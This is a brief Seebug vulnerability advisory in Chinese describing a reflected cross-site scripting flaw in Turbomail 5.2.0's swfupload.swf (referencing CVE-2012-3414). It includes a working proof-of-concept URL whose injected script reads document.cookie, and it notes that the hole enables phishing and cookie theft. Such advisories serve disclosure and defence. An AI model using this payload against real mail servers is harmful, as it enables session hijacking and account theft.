Lucene search

K
seebugRootSSV:95642
HistoryDec 24, 2014 - 12:00 a.m.

Turbomail邮件系统XSS-1

2014-12-2400:00:00
Root
www.seebug.org
205

0.034 Low

EPSS

Percentile

90.4%

简要描述:

Turbomail邮件系统最新版某处存在xss漏洞,可以用来钓鱼,获取cookie等

详细说明:

版本:windows server下搭建的最新版5.2.0
漏洞文件为
C:\turbomail\web\webapps\ROOT\enterprise\swfupload\swfupload.swf
此版本存在xss缺陷,参考CVE-2012-3414
http://mail.fuck.com:8080/enterprise/swfupload/swfupload/swfupload.swf?movieName="]);}catch%28e%29{}if%28!self.a%29self.a=!alert%28document.cookie%29;//

<img src=“https://images.seebug.org/upload/201412/21231543e3d5323acc40e0e57f14953dafe17b65.png” alt=“ssv.png” width=“600”>

<img src=“https://images.seebug.org/upload/201412/21231435a93e9ff8afab88501cb6f801ff6b8029.png” alt=“t1.png” width=“600”>

漏洞证明:

如上